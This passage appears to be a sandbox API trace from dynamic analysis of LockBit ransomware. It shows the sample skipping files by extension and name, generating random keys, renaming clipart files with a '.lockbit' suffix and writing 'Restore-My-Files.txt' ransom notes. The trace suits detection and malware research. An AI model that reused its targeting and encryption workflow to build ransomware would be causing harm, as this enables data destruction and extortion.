(lpString1=".dll", lpString2=".WMF") returned -1 [0109.363] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.363] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.363] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.363] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.363] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.363] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.363] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.363] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.363] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BS00145_.WMF") returned 1 [0109.363] lstrcmpiW (lpString1="ntldr", lpString2="BS00145_.WMF") returned 1 [0109.363] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BS00145_.WMF") returned 1 [0109.363] lstrcmpiW (lpString1="bootsect.bak", lpString2="BS00145_.WMF") returned -1 [0109.363] lstrcmpiW (lpString1="autorun.inf", lpString2="BS00145_.WMF") returned -1 [0109.364] lstrcmpiW (lpString1="thumbs.db", lpString2="BS00145_.WMF") returned 1 [0109.364] lstrcmpiW (lpString1="iconcache.db", lpString2="BS00145_.WMF") returned 1 [0109.364] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.364] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned=".WMF" [0109.364] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.364] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.364] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.364] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.364] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.364] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.364] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.364] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.364] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.364] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.364] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.364] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.364] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.364] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.364] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.364] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.365] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.365] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.365] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.365] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.365] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.365] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.365] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.365] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.365] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.365] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.365] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.365] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.365] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF.lockbit") returned 72 [0109.365] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00145_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0109.371] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.371] malloc (_Size=0x40068) returned 0x1ff1e60 [0109.371] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1712) returned 1 [0109.371] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.372] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.372] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0109.372] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.372] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.372] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0109.372] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.376] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.376] malloc (_Size=0xa6) returned 0x77d800 [0109.376] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.377] free (_Block=0x77d800) [0109.377] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.377] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.377] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.377] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ca47100, ftCreationTime.dwHighDateTime=0x1bd4af0, ftLastAccessTime.dwLowDateTime=0x600889f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7ca47100, ftLastWriteTime.dwHighDateTime=0x1bd4af0, nFileSizeHigh=0x0, nFileSizeLow=0x20ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="BS00174_.WMF", cAlternateFileName="")) returned 1 [0109.377] lstrcmpiW (lpString1=".", lpString2="BS00174_.WMF") returned -1 [0109.377] lstrcmpiW (lpString1="..", lpString2="BS00174_.WMF") returned -1 [0109.377] PathFindExtensionW (pszPath="BS00174_.WMF") returned=".WMF" [0109.377] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.377] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.377] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.377] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.377] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.377] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.377] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.378] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.378] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.378] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.378] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.378] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.378] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.378] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.378] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.378] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.378] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.378] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.378] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.378] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.378] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.378] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.378] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.378] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.378] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.379] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.379] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.379] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.379] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.379] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.379] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.379] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.379] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.379] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.379] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.379] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.379] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.379] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.379] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.379] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.379] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.379] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.379] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.379] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.379] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.379] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.379] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.380] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BS00174_.WMF") returned 1 [0109.380] lstrcmpiW (lpString1="ntldr", lpString2="BS00174_.WMF") returned 1 [0109.380] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BS00174_.WMF") returned 1 [0109.380] lstrcmpiW (lpString1="bootsect.bak", lpString2="BS00174_.WMF") returned -1 [0109.380] lstrcmpiW (lpString1="autorun.inf", lpString2="BS00174_.WMF") returned -1 [0109.380] lstrcmpiW (lpString1="thumbs.db", lpString2="BS00174_.WMF") returned 1 [0109.380] lstrcmpiW (lpString1="iconcache.db", lpString2="BS00174_.WMF") returned 1 [0109.380] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.380] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned=".WMF" [0109.380] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.380] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.380] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.380] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.380] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.380] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.380] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.380] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.380] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.380] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.380] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.380] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.381] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.381] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.381] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.381] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.381] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.381] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.381] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.381] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.381] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.381] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.381] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.381] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.381] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.381] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.381] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.381] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.381] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF.lockbit") returned 72 [0109.381] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00174_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0109.382] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.382] malloc (_Size=0x40068) returned 0x3e70008 [0109.382] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=8366) returned 1 [0109.382] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.383] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.383] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0109.383] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.383] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.383] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0109.383] ReadFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0109.389] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.389] malloc (_Size=0xa6) returned 0x77d800 [0109.389] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.390] free (_Block=0x77d800) [0109.390] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.390] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.390] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.390] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f738600, ftCreationTime.dwHighDateTime=0x1bd4b31, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7f738600, ftLastWriteTime.dwHighDateTime=0x1bd4b31, nFileSizeHigh=0x0, nFileSizeLow=0x1370, dwReserved0=0x0, dwReserved1=0x0, cFileName="BS00184_.WMF", cAlternateFileName="")) returned 1 [0109.390] lstrcmpiW (lpString1=".", lpString2="BS00184_.WMF") returned -1 [0109.390] lstrcmpiW (lpString1="..", lpString2="BS00184_.WMF") returned -1 [0109.390] PathFindExtensionW (pszPath="BS00184_.WMF") returned=".WMF" [0109.390] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.390] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.390] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.390] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.390] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.391] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.391] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.391] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.391] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.391] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.391] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.391] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.391] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.391] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.391] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.391] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.391] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.391] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.391] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.391] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.391] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.391] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.391] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.392] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.392] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.392] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.392] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.392] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.392] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.392] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.392] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.392] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.392] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.392] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.392] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.392] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.392] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.392] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.392] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.392] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.393] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.393] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.393] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.393] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.393] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.393] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.393] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.393] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BS00184_.WMF") returned 1 [0109.393] lstrcmpiW (lpString1="ntldr", lpString2="BS00184_.WMF") returned 1 [0109.393] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BS00184_.WMF") returned 1 [0109.393] lstrcmpiW (lpString1="bootsect.bak", lpString2="BS00184_.WMF") returned -1 [0109.393] lstrcmpiW (lpString1="autorun.inf", lpString2="BS00184_.WMF") returned -1 [0109.393] lstrcmpiW (lpString1="thumbs.db", lpString2="BS00184_.WMF") returned 1 [0109.393] lstrcmpiW (lpString1="iconcache.db", lpString2="BS00184_.WMF") returned 1 [0109.393] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.394] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned=".WMF" [0109.394] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.394] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.394] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.394] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.394] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.394] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.394] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.394] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.394] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.394] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.394] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.394] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.394] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.394] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.394] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.394] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.394] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.394] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.395] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.395] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.395] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.395] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.395] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.395] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.395] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.395] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.395] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.395] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.395] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF.lockbit") returned 72 [0109.395] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00184_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0109.396] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.396] malloc (_Size=0x40068) returned 0x3d70048 [0109.397] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=4976) returned 1 [0109.397] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.398] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.398] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0109.398] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.398] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.398] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0109.398] ReadFile (in: hFile=0x3ac, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0109.405] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.405] malloc (_Size=0xa6) returned 0x77d800 [0109.405] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.406] free (_Block=0x77d800) [0109.406] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.406] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") 